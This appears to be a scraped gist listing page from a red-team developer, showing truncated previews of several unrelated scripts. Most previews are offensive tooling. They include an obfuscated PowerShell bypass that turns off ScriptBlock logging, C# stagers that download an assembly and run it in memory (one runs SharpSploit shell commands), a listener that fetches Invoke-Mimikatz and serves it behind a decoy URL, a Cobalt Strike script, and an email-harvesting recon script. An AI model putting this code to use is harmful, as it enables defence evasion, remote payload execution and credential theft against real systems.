This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!powershell | |
# Copyright: (c) 2022 Jordan Borean (@jborean93) jborean93@gmail.com | |
# Copyright: (c) 2023, Ryan Cobb <ryancobb65@gmail.com> | |
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) | |
#AnsibleRequires -CsharpUtil Ansible.Basic | |
# win_domain_child module |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Measure-CharacterFrequency | |
{ | |
<# | |
.SYNOPSIS | |
Measures the letter / character frequency in a block of text, ignoring whitespace | |
and PowerShell comment blocks. | |
Author: Lee Holmes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
if len(sys.argv) is 3: | |
domain = sys.argv[1] | |
api_key = sys.argv[2] | |
if domain is not None: | |
url = "https://hunter.io/v2/domain-search?limit=10000&offset=0&domain="\ | |
+domain+"&api_key="+api_key+"&format=json" | |
hunterJsonData = requests.get(url) | |
for email in hunterJsonData.json()['data']['emails']: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Program { | |
public static void Main() { | |
System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", "")); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8080/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
$Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@using Covenant.Core | |
@using Covenant.Models.Grunts | |
@model GruntTasking | |
@{ | |
Layout = "_GruntTaskingLayout"; | |
ViewData["Title"] = "Grunts"; | |
} | |
<div class="d-flex justify-content-between flex-wrap flex-md-nowrap pb-2 mb-3"> | |
<h1 class="h2">GruntTasking: <span id="tasking-name" class="text-primary">@Html.DisplayFor(model => model.Name)</span></h1> | |
</div> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cobbr@mac:~/SharpGen > cp -r ~/GhostPack/SharpWMI/SharpWMI ./Source | |
cobbr@mac:~/SharpGen > cat example.txt | |
SharpWMI.Program.LocalWMIQuery("select * from win32_service"); | |
Console.WriteLine(Host.GetProcessList()); | |
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt | |
... | |
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe |
NewerOlder